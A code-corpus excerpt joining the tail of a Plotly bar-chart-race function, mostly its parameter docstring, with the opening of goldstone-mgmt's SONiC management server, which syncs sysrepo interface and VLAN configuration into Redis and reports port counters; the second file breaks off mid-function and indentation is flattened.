def bar_chart_race_plotly(df, filename=None, orientation='h', sort='desc', n_bars=None,
fixed_order=False, fixed_max=False, steps_per_period=10,
period_length=500, end_period_pause=0, interpolate_period=False,
period_label=True, period_template=None, period_summary_func=None,
perpendicular_bar_func=None, colors=None, title=None, bar_size=.95,
bar_textposition='outside', bar_texttemplate=None, bar_label_font=None,
tick_label_font=None, hovertemplate=None, slider=True, scale='linear',
bar_kwargs=None, layout_kwargs=None, write_html_kwargs=None,
filter_column_colors=False):
'''
Create an animated bar chart race using Plotly. Data must be in
'wide' format where each row represents a single time period and each
column represents a distinct category. Optionally, the index can label
the time period. Bar length and location change linearly from one time
period to the next.
Note - The duration of each frame is calculated as
`period_length` / `steps_per_period`, but is unlikely to actually
be this number, especially when duration is low (< 50ms). You may have to
experiment with different combinations of `period_length` and
`steps_per_period` to get the animation at the desired speed.
If no `filename` is given, a plotly figure is returned that is embedded
into the notebook.
Parameters
----------
df : pandas DataFrame
Must be a 'wide' DataFrame where each row represents a single period
of time. Each column contains the values of the bars for that
category. Optionally, use the index to label each time period.
The index can be of any type.
filename : `None` or str, default None
If `None` return plotly animation, otherwise save
to disk. Can only save as HTML at this time.
orientation : 'h' or 'v', default 'h'
Bar orientation - horizontal or vertical
sort : 'desc' or 'asc', default 'desc'
Choose how to sort the bars. Use 'desc' to put largest bars on top
and 'asc' to place largest bars on bottom.
n_bars : int, default None
Choose the maximum number of bars to display on the graph.
By default, use all bars. New bars entering the race will appear
from the edge of the axes.
fixed_order : bool or list, default False
When `False`, bar order changes every time period to correspond
with `sort`. When `True`, bars remained fixed according to their
final value corresponding with `sort`. Otherwise, provide a list
of the exact order of the categories for the entire duration.
fixed_max : bool, default False
Whether to fix the maximum value of the axis containing the values.
When `False`, the axis for the values will have its maximum (x/y)
just after the largest bar of the current time period.
The axis maximum will change along with the data.
When True, the maximum axis value will remain constant for the
duration of the animation. For example, in a horizontal bar chart,
if the largest bar has a value of 100 for the first time period and
10,000 for the last time period. The xlim maximum will be 10,000
for each frame.
steps_per_period : int, default 10
The number of steps to go from one time period to the next.
The bars will grow linearly between each period.
period_length : int, default 500
Number of milliseconds to animate each period (row).
Default is 500ms (half of a second)
end_period_pause : int, default 0
Number of milliseconds to pause the animation at the end of
each period.
interpolate_period : bool, default `False`
Whether to interpolate the period. Only valid for datetime or
numeric indexes. When set to `True`, for example,
the two consecutive periods 2020-03-29 and 2020-03-30 with
`steps_per_period` set to 4 would yield a new index of
2020-03-29 00:00:00
2020-03-29 06:00:00
2020-03-29 12:00:00
2020-03-29 18:00:00
2020-03-30 00:00:00
period_label : bool or dict, default `True`
If `True` or dict, use the index as a large text label
on the figure labeling each period. No label when 'False'.
Use a dictionary to supply the exact position of the period
along with any valid parameters of a plotly annotation.
Example:
{
'x': .99,
'y': .8,
'font' : {'family': 'Helvetica', 'size': 20, 'color': 'orange'},
'xanchor': 'right',
}
Reference - https://plotly.com/python/reference/#layout-annotations
The default location depends on `orientation` and `sort`
* h, desc -> x=.95, y=.15
* h, asc -> x=.95, y=.85
* v, desc -> x=.95, y=.85
* v, asc -> x=.05, y=.85
period_template : str, default `None`
Either a string with date directives or
a new-style (Python 3.6+) formatted string
For a string with a date directive, find the complete list here
https://docs.python.org/3/library/datetime.html#strftime-and-strptime-format-codes
Example of string with date directives
'%B %d, %Y'
Will change 2020/03/29 to March 29, 2020
For new-style formatted string. Use curly braces and the variable `x`,
which will be passed the current period's index value.
Example:
'Period {x:10.2f}'
Date directives will only be used for datetime indexes.
period_summary_func : function, default None
Custom text added to the axes each period.
Create a user-defined function that accepts two pandas Series of the
current time period's values and ranks. It must return a dictionary
containing at a minimum the keys "x", "y", and "text" which will be
passed used for a plotly annotation.
Example:
def func(values, ranks):
total = values.sum()
text = f'Worldwide deaths: {total}'
return {'x': .85, 'y': .2, 'text': text, 'size': 11}
perpendicular_bar_func : function or str, default None
Creates a single bar perpendicular to the main bars that spans the
length of the axis.
Use either a string that the DataFrame `agg` method understands or a
user-defined function.
DataFrame strings - 'mean', 'median', 'max', 'min', etc..
The function is passed two pandas Series of the current time period's
data and ranks. It must return a single value.
def func(values, ranks):
return values.quantile(.75)
colors : str or sequence colors, default 'dark12'
Colors to be used for the bars. All matplotlib and plotly colormaps are
available by string name. Colors will repeat if there are more bars than colors.
'dark12' is the default colormap. If there are more than 10 columns,
then the default colormap will be 'dark24'
Append "_r" to the colormap name to use the reverse of the colormap.
i.e. "dark12_r"
title : str, dict, or plotly.graph_objects.layout.Title, default None
Title of animation. Use a string for simple titles or a
dictionary to specify several properties
{'text': 'My Bar Chart Race',
'x':0.5,
'y':.9,
'xanchor': 'center',
'yanchor': 'bottom'}
Other properties include: font, pad, xref, yref
bar_size : float, default .95
Height/width of bars for horizontal/vertical bar charts.
Use a number between 0 and 1
Represents the fraction of space that each bar takes up.
When equal to 1, no gap remains between the bars.
bar_textposition : str or sequence, default `None`
Position on bar to place its label.
Use one of the strings - 'inside', 'outside', 'auto', 'none'
or a sequence of the above
bar_texttemplate : str, default '%{x:,.0f}' or '%{y:,.0f}'
Template string used for rendering the text inside/outside
the bars. Variables are inserted using %{variable},
for example "y: %{y}". Numbers are formatted using
d3-format's syntax %{variable:d3-format}, for example
"Price: %{y:$.2f}".
bar_label_font : number or dict, default None
Font size of numeric bar labels. When None, font size is 12.
Use a dictionary to supply several font properties.
Example:
{
'size': 12,
'family': 'Courier New, monospace',
'color': '#7f7f7f'
}
tick_label_font : number or dict, default None
Font size of tick labels. When None, font size is 12.
Use a dictionary to supply several font properties.
hovertemplate : str, default None
Template string used for rendering the information that appears
in the hover box. By default, it is '%{y} - %{x:,.0f}<extra></extra>'
Reference: https://plotly.com/python/hover-text-and-formatting
slider : bool, default True
Whether or not to place a slider below the animation
scale : 'linear' or 'log', default 'linear'
Type of scaling to use for the axis containing the values
bar_kwargs : dict, default `None` (opacity=.8)
Other keyword arguments (within a dictionary) forwarded to the
plotly `go.Bar` function. If no value for 'opacity' is given,
then it is set to .8 by default.
layout_kwargs : dict or go.Layout instance, default None
Other keyword arguments (within a dictionary) are forwarded to
the plotly `go.Layout` function. Use this to control the size of
the figure.
Example:
{
'width': 600,
'height': 400,
'showlegend': True
}
write_html_kwargs : dict, default None
Arguments passed to the write_html plotly go.Figure method.
Example:
{
'auto_play': False,
'include_plotlyjs': 'cdn',
'full_html': False
}
Reference: https://plotly.github.io/plotly.py-docs/generated/plotly.io.write_html.html
filter_column_colors : bool, default `False`
When setting n_bars, it's possible that some columns never
appear in the animation. Regardless, all columns get assigned
a color by default.
For instance, suppose you have 100 columns
in your DataFrame, set n_bars to 10, and 15 different columns
make at least one appearance in the animation. Even if your
colormap has at least 15 colors, it's possible that many
bars will be the same color, since each of the 100 columns is
assigned one of the colormap's colors.
Setting this to `True` will map your colormap to just those
columns that make an appearance in the animation, helping
avoid duplication of colors.
Setting this to `True` will also have the (possibly unintended)
consequence of changing the color of each bar every time a
new integer for n_bars is used.
EXPERIMENTAL
This parameter is experimental and may be changed/removed
in a later version.
Returns
-------
When `filename` is left as `None`, a plotly figure is returned and
embedded into the notebook. Otherwise, a file of the HTML is
saved and `None` is returned.
References
----------
Plotly Figure - https://plotly.com/python/reference
Plotly API - https://plotly.com/python-api-reference
d3 formatting - https://github.com/d3/d3-3.x-api-reference/blob/master/Formatting.md
Examples
--------
Use the `load_data` function to get an example dataset to
create an animation.
df = bcr.load_dataset('covid19')
bcr.bar_chart_race(
df=df,
filename='covid19_horiz_desc.html',
orientation='h',
sort='desc',
n_bars=8,
fixed_order=False,
fixed_max=True,
steps_per_period=10,
period_length=500,
interpolate_period=False,
period_label={'x': .99, 'y': .8, 'font': {'size': 25, 'color': 'blue'}},
period_template='%B %d, %Y',
period_summary_func=lambda v, r: {'x': .85, 'y': .2,
'text': f'Total deaths: {v.sum()}',
'size': 11},
perpendicular_bar_func='median',
colors='dark12',
title='COVID-19 Deaths by Country',
bar_size=.95,
bar_textposition='outside',
bar_texttemplate='%{x}',
bar_label_font=12,
tick_label_font=12,
hovertemplate=None,
scale='linear',
bar_kwargs={'opacity': .7},
write_html_kwargs=None,
filter_column_colors=False)
'''
bcr = _BarChartRace(df, filename, orientation, sort, n_bars, fixed_order, fixed_max,
steps_per_period, period_length, end_period_pause, interpolate_period,
period_label, period_template, period_summary_func, perpendicular_bar_func,
colors, title, bar_size, bar_textposition, bar_texttemplate, bar_label_font,
tick_label_font, hovertemplate, slider, scale, bar_kwargs, layout_kwargs,
write_html_kwargs, filter_column_colors)
return bcr.make_animation()
| 42.90445 | 107 | 0.580494 |
5b5a19f112108097df97f1bf855457ee610e3f9a | 51,036 | py | Python | src/south/sonic/gssonic/main.py | palcnetworks/goldstone-mgmt | 4008ff691f3c5e38b2d53c122bace483b0235e55 | [
"Apache-2.0"
] | 1 | 2021-03-29T14:20:14.000Z | 2021-03-29T14:20:14.000Z | src/south/sonic/gssonic/main.py | palcnetworks/goldstone-mgmt | 4008ff691f3c5e38b2d53c122bace483b0235e55 | [
"Apache-2.0"
] | 6 | 2020-07-17T16:00:45.000Z | 2020-09-09T20:40:33.000Z | src/south/sonic/gssonic/main.py | palcnetworks/goldstone-mgmt | 4008ff691f3c5e38b2d53c122bace483b0235e55 | [
"Apache-2.0"
] | 4 | 2020-07-12T14:48:08.000Z | 2021-03-31T07:02:14.000Z | import sysrepo
import libyang
import logging
import asyncio
import argparse
import json
import signal
import struct
import base64
import swsssdk
import re
import redis
import os
from .k8s_api import incluster_apis
logger = logging.getLogger(__name__)
COUNTER_PORT_MAP = "COUNTERS_PORT_NAME_MAP"
COUNTER_TABLE_PREFIX = "COUNTERS:"
REDIS_SERVICE_HOST = os.getenv("REDIS_SERVICE_HOST")
REDIS_SERVICE_PORT = os.getenv("REDIS_SERVICE_PORT")
def _decode(string):
if hasattr(string, "decode"):
return string.decode("utf-8")
return string
def yang_val_to_speed(yang_val):
yang_val = yang_val.split("_")
return int(yang_val[1].split("GB")[0])
def speed_to_yang_val(speed):
# Considering only speeds supported in CLI
if speed == b"25000":
return "SPEED_25GB"
elif speed == b"50000":
return "SPEED_50GB"
elif speed == b"100000":
return "SPEED_100GB"
elif speed == b"10000":
return "SPEED_10GB"
elif speed == b"1000":
return "SPEED_1GB"
raise sysrepo.SysrepoInvalArgError(f"unsupported speed: {speed}")
class Server(object):
def __init__(self):
self.sonic_db = swsssdk.SonicV2Connector()
# HMSET is not available in above connector, so creating new one
self.sonic_configdb = swsssdk.ConfigDBConnector()
self.sonic_configdb.connect()
self.loop = asyncio.get_event_loop()
self.conn = sysrepo.SysrepoConnection()
self.sess = self.conn.start_session()
self.is_usonic_rebooting = False
self.k8s = incluster_apis()
self.counter_dict = {
"SAI_PORT_STAT_IF_IN_UCAST_PKTS": 0,
"SAI_PORT_STAT_IF_IN_ERRORS": 0,
"SAI_PORT_STAT_IF_IN_DISCARDS": 0,
"SAI_PORT_STAT_IF_IN_BROADCAST_PKTS": 0,
"SAI_PORT_STAT_IF_IN_MULTICAST_PKTS": 0,
"SAI_PORT_STAT_IF_IN_UNKNOWN_PROTOS": 0,
"SAI_PORT_STAT_IF_OUT_UCAST_PKTS": 0,
"SAI_PORT_STAT_IF_OUT_ERRORS": 0,
"SAI_PORT_STAT_IF_OUT_DISCARDS": 0,
"SAI_PORT_STAT_IF_OUT_BROADCAST_PKTS": 0,
"SAI_PORT_STAT_IF_OUT_MULTICAST_PKTS": 0,
"SAI_PORT_STAT_IF_OUT_UNKNOWN_PROTOS": 0,
"SAI_PORT_STAT_IF_IN_OCTETS": 0,
"SAI_PORT_STAT_IF_OUT_OCTETS": 0,
}
self.counter_if_dict = {}
self.notif_if = {}
self.mtu_default = self.get_default_from_yang("mtu")
self.speed_default = "100000"
def stop(self):
self.sess.stop()
self.conn.disconnect()
def get_default_from_yang(self, key):
ctx = self.sess.get_ly_ctx()
xpath = "/goldstone-interfaces:interfaces"
xpath += "/goldstone-interfaces:interface"
if key == "mtu":
xpath += "/goldstone-ip:ipv4"
xpath += "/goldstone-ip:mtu"
for node in ctx.find_path(xpath):
return node.default()
def get_config_db_keys(self, pattern):
keys = self.sonic_db.keys(self.sonic_db.CONFIG_DB, pattern=pattern)
return map(_decode, keys) if keys else []
def set_config_db(self, event, _hash, key, value):
if event != "done":
return
return self.sonic_db.set(self.sonic_db.CONFIG_DB, _hash, key, value)
async def restart_usonic(self):
self.is_usonic_rebooting = True
await self.k8s.restart_usonic()
async def watch_pods(self):
await self.k8s.watch_pods()
logger.debug("uSONiC deployment ready")
# Enable counters in SONiC
self.enable_counters()
# After usonic is UP, it takes approximately
# 15 seconds to populate counter data
logger.debug("waiting another 15 seconds for counters")
await asyncio.sleep(15)
# Caching base values of counters
self.cache_counters()
logger.info("uSONiC ready")
async def wait_for_sr_unlock(self):
# Since is_locked() always returns False,
# keep retrying until the locks can be taken
while True:
try:
with self.sess.lock("goldstone-interfaces"):
with self.sess.lock("goldstone-vlan"):
break
except:
# If taking lock fails
await asyncio.sleep(0.1)
continue
# Release lock and return
return
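# Map a sysrepo change xpath such as
# /goldstone-interfaces:interfaces/interface[name='Ethernet0']/goldstone-ip:ipv4/mtu
# onto the CONFIG_DB hash ("PORT|Ethernet0"), the field key and helper attributes
# used by the change callbacks below (the interface name above is only illustrative).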
def parse_change_req(self, xpath):
xpath = xpath.split("/")
_hash = ""
key = ""
member = ""
attr_dict = {"xpath": xpath}
for i in range(len(xpath)):
node = xpath[i]
if node.find("interface") == 0:
ifname = node.split("'")[1]
intf_names = self.sonic_db.keys(
self.sonic_db.CONFIG_DB, pattern="PORT|" + ifname
)
if intf_names == None:
logger.debug(
"*************** Invalid Interface name ****************"
)
raise sysrepo.SysrepoInvalArgError("Invalid Interface name")
attr_dict.update({"ifname": ifname})
_hash = _hash + "PORT|" + ifname
if i + 1 < len(xpath):
key = xpath[i + 1]
if key == "goldstone-ip:ipv4" and i + 2 < len(xpath):
key = xpath[i + 2]
if key == "breakout" and i + 2 < len(xpath):
key = xpath[i + 2]
break
if node.find("VLAN_LIST") == 0:
_hash = _hash + "VLAN|" + node.split("'")[1]
if i + 1 < len(xpath):
if xpath[i + 1].find("members") == 0 and xpath[i + 1] != "members":
key = "members@"
member = xpath[i + 1].split("'")[1]
elif xpath[i + 1] == "members":
key = "members@"
else:
key = xpath[i + 1]
attr_dict.update({"member": member})
break
if node.find("VLAN_MEMBER_LIST") == 0:
_hash = (
_hash
+ "VLAN_MEMBER|"
+ node.split("'")[1]
+ "|"
+ node.split("'")[3]
)
if i + 1 < len(xpath):
key = xpath[i + 1]
break
return key, _hash, attr_dict
async def breakout_callback(self):
self.sess.switch_datastore("running")
await self.wait_for_sr_unlock()
with self.sess.lock("goldstone-interfaces"):
with self.sess.lock("goldstone-vlan"):
await self.watch_pods()
self.reconcile()
self.update_oper_db()
self.is_usonic_rebooting = False
self.sess.switch_datastore("running")
async def breakout_update_usonic(self, breakout_dict):
logger.debug("Starting to Update usonic's configMap and deployment")
interface_list = []
self.sess.switch_datastore("running")
# Frame interface_list with data available in sysrepo
intf_data = self.sess.get_data("/goldstone-interfaces:interfaces")
if "interfaces" in intf_data:
intf_list = intf_data["interfaces"]["interface"]
for intf in intf_list:
ifname = intf["name"]
# Priority for adding interfaces in interface_list:
#
# 1. Preference will be for the data received as arguments
# as this data will not be committed in sysrepo yet.
# 2. Interfaces present in datastore with already configured
# breakout data or without breakout data
if ifname in breakout_dict:
speed = None
breakout_data = breakout_dict[ifname]
if breakout_data["channel-speed"] != None:
speed = yang_val_to_speed(breakout_data["channel-speed"])
interface_list.append(
[ifname, breakout_data["num-channels"], speed]
)
else:
if "breakout" in intf:
breakout_data = intf["breakout"]
speed = None
if breakout_data["channel-speed"] != None:
speed = yang_val_to_speed(breakout_data["channel-speed"])
interface_list.append(
[ifname, breakout_data["num-channels"], speed]
)
else:
interface_list.append([ifname, None, None])
is_updated = await self.k8s.update_usonic_config(interface_list)
# Restart deployment if configmap update is successful
if is_updated:
await self.restart_usonic()
return is_updated
def get_running_data(self, xpath):
self.sess.switch_datastore("running")
return self.sess.get_data(xpath)
def is_breakout_port(self, ifname):
xpath = f"/goldstone-interfaces:interfaces/interface[name='{ifname}']"
self.sess.switch_datastore("operational")
data = self.sess.get_data(xpath, no_subs=True)
try:
logger.debug(f"data: {data}")
data = data["interfaces"]["interface"][ifname]["breakout"]
if data.get("num-channels", 1) > 1 or "parent" in data:
return True
except KeyError:
return False
return False
def get_configured_breakout_ports(self, ifname):
xpath = f"/goldstone-interfaces:interfaces/interface"
self.sess.switch_datastore("operational")
data = self.sess.get_data(xpath, no_subs=True)
logger.debug(f"get_configured_breakout_ports: {ifname}, {data}")
ports = []
for intf in data.get("interfaces", {}).get("interface", []):
try:
if intf["breakout"]["parent"] == ifname:
name = intf["name"]
d = self.get_running_data(f"{xpath}[name='{name}']")
logger.debug(f"get_configured_breakout_ports: {name}, {d}")
ports.append(intf["name"])
except (sysrepo.errors.SysrepoNotFoundError, KeyError):
pass
logger.debug(f"get_configured_breakout_ports: ports: {ports}")
return ports
def vlan_change_cb(self, event, req_id, changes, priv):
logger.debug(f"event: {event}, changes: {changes}")
if event not in ["change", "done"]:
logger.warn(f"unsupported event: {event}")
return
for change in changes:
key, _hash, attr_dict = self.parse_change_req(change.xpath)
if "member" in attr_dict:
member = attr_dict["member"]
logger.debug(f"key: {key}, _hash: {_hash}, attr_dict: {attr_dict}")
if isinstance(change, sysrepo.ChangeCreated):
logger.debug(f"change created: {change}")
if type(change.value) != type({}) and key != "name" and key != "ifname":
if key == "members@":
try:
mem = _decode(
self.sonic_db.get(self.sonic_db.CONFIG_DB, _hash, key)
)
mem_list = mem.split(",")
if change.value not in mem_list:
mem = mem + "," + str(change.value)
self.set_config_db(event, _hash, key, mem)
except:
self.set_config_db(event, _hash, key, change.value)
else:
self.set_config_db(event, _hash, key, change.value)
if isinstance(change, sysrepo.ChangeModified):
logger.debug(f"change modified: {change}")
raise sysrepo.SysrepoUnsupportedError("Modification is not supported")
if isinstance(change, sysrepo.ChangeDeleted):
logger.debug(f"change deleted: {change}")
if key == "members@":
mem = _decode(
self.sonic_db.get(self.sonic_db.CONFIG_DB, _hash, key)
)
if mem != None:
mem = mem.split(",")
if member in mem:
mem.remove(member)
if len(mem) >= 1:
value = ",".join(mem)
self.set_config_db(event, _hash, key, value)
elif _hash.find("VLAN|") == 0 and key == "":
if event == "done":
self.sonic_db.delete(self.sonic_db.CONFIG_DB, _hash)
elif _hash.find("VLAN_MEMBER|") == 0 and key == "":
if event == "done":
self.sonic_db.delete(self.sonic_db.CONFIG_DB, _hash)
async def intf_change_cb(self, event, req_id, changes, priv):
logger.debug(f"change_cb: event: {event}, changes: {changes}")
if event not in ["change", "done"]:
logger.warn(f"unsupported event: {event}")
return
valid_speeds = [40000, 100000]
breakout_valid_speeds = [] # no speed change allowed for sub-interfaces
for change in changes:
logger.debug(f"change_cb: {change}")
key, _hash, attr_dict = self.parse_change_req(change.xpath)
if "ifname" in attr_dict:
ifname = attr_dict["ifname"]
logger.debug(f"key: {key}, _hash: {_hash}, attr_dict: {attr_dict}")
if isinstance(change, sysrepo.ChangeCreated):
logger.debug("......change created......")
if type(change.value) != type({}) and key != "name" and key != "ifname":
if key == "description" or key == "alias":
self.set_config_db(event, _hash, key, change.value)
elif key == "admin-status":
self.set_config_db(event, _hash, "admin_status", change.value)
elif key == "speed":
if event == "change":
ifname = attr_dict["ifname"]
if self.is_breakout_port(ifname):
valids = breakout_valid_speeds
else:
valids = valid_speeds
if change.value not in valids:
logger.debug(
f"invalid speed: {change.value}, candidates: {valids}"
)
raise sysrepo.SysrepoInvalArgError("Invalid speed")
self.set_config_db(event, _hash, "speed", change.value)
elif key == "forwarding" or key == "enabled":
logger.debug(
"This key:{} should not be set in redis ".format(key)
)
elif key == "num-channels" or key == "channel-speed":
logger.debug(
"This key:{} should not be set in redis ".format(key)
)
# TODO use the parent leaf to detect if this is a sub-interface or not
# using "_1" is vulnerable to the interface naming schema change
if "_1" not in ifname:
raise sysrepo.SysrepoInvalArgError(
"breakout cannot be configured on a sub-interface"
)
paired_key = (
"num-channels"
if key == "channel-speed"
else "channel-speed"
)
tmp_xpath = change.xpath.replace(key, paired_key)
try:
_data = self.get_running_data(tmp_xpath)
except:
logger.debug("Both Arguments are not present yet")
break
try:
if_list = _data["interfaces"]["interface"]
for intf in if_list:
paired_value = intf["breakout"][paired_key]
except KeyError:
logging.error(
f"Failed fetching {paired_key} from get_data for breakout"
)
break
# We will wait for both the parameters of breakout in yang to be
# configured on the parent interface.
#
# Once configuration is done, we will update the configmap and
# deployment in breakout_update_usonic() function.
# After the update, we will watch asynchronously in watch_pods()
# for the `usonic` deployment to be UP.
#
# Once `usonic` deployment is UP, another asynchronous call breakout_callback()
# will do the following:
# 1. Delete all the sub-interfaces created in operational datastore (during
# breakout delete operation)
# 2. Reconciliation will be run to populate Redis DB(from running datastore)
# and corresponding data in operational datastore (during breakout config,
# new sub-interfaces will be added in operational datastore in this step)
logger.info(
"Both Arguments are present for breakout {} {}".format(
change.value, paired_value
)
)
breakout_dict = {
ifname: {key: change.value, paired_key: paired_value}
}
if event == "done":
is_updated = await self.breakout_update_usonic(
breakout_dict
)
if is_updated:
asyncio.create_task(self.breakout_callback())
else:
self.set_config_db(event, _hash, key, change.value)
if isinstance(change, sysrepo.ChangeModified):
logger.debug("......change modified......")
if key == "description" or key == "alias":
self.set_config_db(event, _hash, key, change.value)
elif key == "admin-status":
self.set_config_db(event, _hash, "admin_status", change.value)
elif key == "forwarding" or key == "enabled":
logger.debug("This key:{} should not be set in redis ".format(key))
elif key == "speed":
if event == "change":
if self.is_breakout_port(ifname):
valids = breakout_valid_speeds
else:
valids = valid_speeds
if change.value not in valids:
logger.debug("****** Invalid speed value *********")
raise sysrepo.SysrepoInvalArgError("Invalid speed")
self.set_config_db(event, _hash, "speed", change.value)
elif key == "num-channels" or key == "channel-speed":
logger.debug("This key:{} should not be set in redis ".format(key))
raise sysrepo.SysrepoInvalArgError(
"Breakout config modification not supported"
)
else:
self.set_config_db(event, _hash, key, change.value)
if isinstance(change, sysrepo.ChangeDeleted):
logger.debug("......change deleted......")
if key in ["channel-speed", "num-channels"]:
if event == "change":
if len(self.get_configured_breakout_ports(ifname)):
raise sysrepo.SysrepoInvalArgError(
"Breakout can't be removed due to the dependencies"
)
continue
assert event == "done"
# change.xpath is
# /goldstone-interfaces:interfaces/interface[name='xxx']/breakout/channel-speed
# or
# /goldstone-interfaces:interfaces/interface[name='xxx']/breakout/num-channels
#
# set xpath to /goldstone-interfaces:interfaces/interface[name='xxx']/breakout
xpath = "/".join(change.xpath.split("/")[:-1])
try:
data = self.get_running_data(xpath)
except sysrepo.errors.SysrepoNotFoundError:
ch = None
speed = None
else:
if_list = data["interfaces"]["interface"]
assert len(if_list) == 1
intf = list(if_list)[0]
config = intf.get("breakout", {})
ch = config.get("num-channels", None)
speed = config.get("channel-speed", None)
# if both channel and speed configuration are deleted
# remove the breakout config from uSONiC
if ch != None or speed != None:
logger.debug(
f"breakout config still exists: ch: {ch}, speed: {speed}"
)
continue
breakout_dict = {
ifname: {"num-channels": None, "channel-speed": None}
}
is_updated = await self.breakout_update_usonic(breakout_dict)
if is_updated:
asyncio.create_task(self.breakout_callback())
elif key in ["mtu", "speed"]:
if event == "done":
if key == "mtu":
value = self.mtu_default
elif key == "speed":
value = self.speed_default
logger.debug(f"adding default value of {key} to redis")
self.pack_defaults_to_redis(ifname=ifname, leaf_node=key)
self.update_oper_db()
elif "PORT|" in _hash and key == "":
if event == "done":
# since sysrepo wipes out the pushed entry in oper ds
# when the corresponding entry in running ds is deleted,
# we need to repopulate the oper ds.
#
# this behavior might change in the future
# https://github.com/sysrepo/sysrepo/issues/1937#issuecomment-742851607
self.update_oper_db()
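# Counters are reported as deltas against the baseline values cached in
# counter_if_dict at startup (or after clear_counters), so a freshly cleared
# counter reads as zero.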
def get_counter(self, ifname, counter):
if ifname not in self.counter_if_dict:
return 0
base = self.counter_if_dict[ifname].get(counter, 0)
key = _decode(
self.sonic_db.get(self.sonic_db.COUNTERS_DB, COUNTER_PORT_MAP, ifname)
)
try:
key = "COUNTERS:" + key
present = _decode(
self.sonic_db.get(self.sonic_db.COUNTERS_DB, key, counter)
)
except:
return 0
if base and present:
return int(present) - int(base)
return 0
def get_oper_data(self, req_xpath):
def delta_counter_value(base, present):
if base and present:
return int(present) - int(base)
else:
return 0
path_prefix = "/goldstone-interfaces:interfaces/interface[name='"
if req_xpath.endswith("oper-status"):
req_xpath = req_xpath.replace(path_prefix, "")
ifname = req_xpath.replace("']/oper-status", "")
key = ifname.replace("Ethernet", "PORT_TABLE:Ethernet")
data = _decode(self.sonic_db.get(self.sonic_db.APPL_DB, key, "oper_status"))
return data
elif req_xpath.endswith("in-octets"):
req_xpath = req_xpath.replace(path_prefix, "")
ifname = req_xpath.replace("']/statistics/in-octets", "")
return self.get_counter(ifname, "SAI_PORT_STAT_IF_IN_OCTETS")
elif req_xpath.endswith("in-unicast-pkts"):
req_xpath = req_xpath.replace(path_prefix, "")
ifname = req_xpath.replace("']/statistics/in-unicast-pkts", "")
return self.get_counter(ifname, "SAI_PORT_STAT_IF_IN_UCAST_PKTS")
elif req_xpath.endswith("in-broadcast-pkts"):
req_xpath = req_xpath.replace(path_prefix, "")
ifname = req_xpath.replace("']/statistics/in-broadcast-pkts", "")
return self.get_counter(ifname, "SAI_PORT_STAT_IF_IN_BROADCAST_PKTS")
elif req_xpath.endswith("in-multicast-pkts"):
req_xpath = req_xpath.replace(path_prefix, "")
ifname = req_xpath.replace("']/statistics/in-multicast-pkts", "")
return self.get_counter(ifname, "SAI_PORT_STAT_IF_IN_MULTICAST_PKTS")
elif req_xpath.endswith("in-discards"):
req_xpath = req_xpath.replace(path_prefix, "")
ifname = req_xpath.replace("']/statistics/in-discards", "")
return self.get_counter(ifname, "SAI_PORT_STAT_IF_IN_DISCARDS")
elif req_xpath.endswith("in-errors"):
req_xpath = req_xpath.replace(path_prefix, "")
ifname = req_xpath.replace("']/statistics/in-errors", "")
return self.get_counter(ifname, "SAI_PORT_STAT_IF_IN_ERRORS")
elif req_xpath.endswith("in-unknown-protos"):
req_xpath = req_xpath.replace(path_prefix, "")
ifname = req_xpath.replace("']/statistics/in-unknown-protos", "")
return self.get_counter(ifname, "SAI_PORT_STAT_IF_IN_UNKNOWN_PROTOS")
elif req_xpath.endswith("out-octets"):
req_xpath = req_xpath.replace(path_prefix, "")
ifname = req_xpath.replace("']/statistics/out-octets", "")
return self.get_counter(ifname, "SAI_PORT_STAT_IF_OUT_OCTETS")
elif req_xpath.endswith("out-unicast-pkts"):
req_xpath = req_xpath.replace(path_prefix, "")
ifname = req_xpath.replace("']/statistics/out-unicast-pkts", "")
return self.get_counter(ifname, "SAI_PORT_STAT_IF_OUT_UCAST_PKTS")
elif req_xpath.endswith("out-broadcast-pkts"):
req_xpath = req_xpath.replace(path_prefix, "")
ifname = req_xpath.replace("']/statistics/out-broadcast-pkts", "")
return self.get_counter(ifname, "SAI_PORT_STAT_IF_OUT_BROADCAST_PKTS")
elif req_xpath.endswith("out-multicast-pkts"):
req_xpath = req_xpath.replace(path_prefix, "")
ifname = req_xpath.replace("']/statistics/out-multicast-pkts", "")
return self.get_counter(ifname, "SAI_PORT_STAT_IF_OUT_MULTICAST_PKTS")
elif req_xpath.endswith("out-discards"):
req_xpath = req_xpath.replace(path_prefix, "")
ifname = req_xpath.replace("']/statistics/out-discards", "")
return self.get_counter(ifname, "SAI_PORT_STAT_IF_OUT_DISCARDS")
elif req_xpath.endswith("out-errors"):
req_xpath = req_xpath.replace(path_prefix, "")
ifname = req_xpath.replace("']/statistics/out-errors", "")
return self.get_counter(ifname, "SAI_PORT_STAT_IF_OUT_ERRORS")
def interface_oper_cb(self, req_xpath):
# Changing to operational datastore to fetch data
# for the unconfigurable params in the xpath, data will
# be fetched from Redis and complete data will be returned.
# Use 'no_subs=True' parameter in oper_cb to fetch data from operational
# datastore and to avoid locking of sysrepo db
self.sess.switch_datastore("operational")
r = {}
path_list = req_xpath.split("/")
statistic_leaves = [
"in-octets",
"in-unicast-pkts",
"in-broadcast-pkts",
"in-multicast-pkts",
"in-discards",
"in-errors",
"in-unknown-protos",
"out-octets",
"out-unicast-pkts",
"out-broadcast-pkts",
"out-multicast-pkts",
"out-discards",
"out-errors",
]
if len(path_list) <= 3:
r = self.sess.get_data(req_xpath, no_subs=True)
if r == {}:
return r
else:
for intf in r["interfaces"]["interface"]:
ifname = intf["name"]
xpath = (
f"/goldstone-interfaces:interfaces/interface[name='{ifname}']"
)
oper_status = self.get_oper_data(xpath + "/oper-status")
if oper_status != None:
intf["oper-status"] = oper_status
xpath = f"/goldstone-interfaces:interfaces/interface[name='{ifname}']/statistics"
intf["statistics"] = {}
for sl in statistic_leaves:
sl_value = self.get_oper_data(xpath + "/" + sl)
if sl_value != None:
intf["statistics"][sl] = sl_value
return r
elif req_xpath[-10:] == "statistics":
xpath_T = req_xpath.replace("/statistics", "")
r = self.sess.get_data(xpath_T, no_subs=True)
if r == {}:
return r
else:
for intf in r["interfaces"]["interface"]:
ifname = intf["name"]
intf["statistics"] = {}
xpath = f"/goldstone-interfaces:interfaces/interface[name='{ifname}']/statistics"
for sl in statistic_leaves:
sl_value = self.get_oper_data(xpath + "/" + sl)
if sl_value != None:
intf["statistics"][sl] = sl_value
return r
elif (
path_list[len(path_list) - 1] in statistic_leaves
or path_list[len(path_list) - 1] == "oper-status"
):
xpath_T = req_xpath.replace(
"/statistics/" + path_list[len(path_list) - 1], ""
)
xpath_T = xpath_T.replace("/oper-status", "")
r = self.sess.get_data(xpath_T, no_subs=True)
if r == {}:
return r
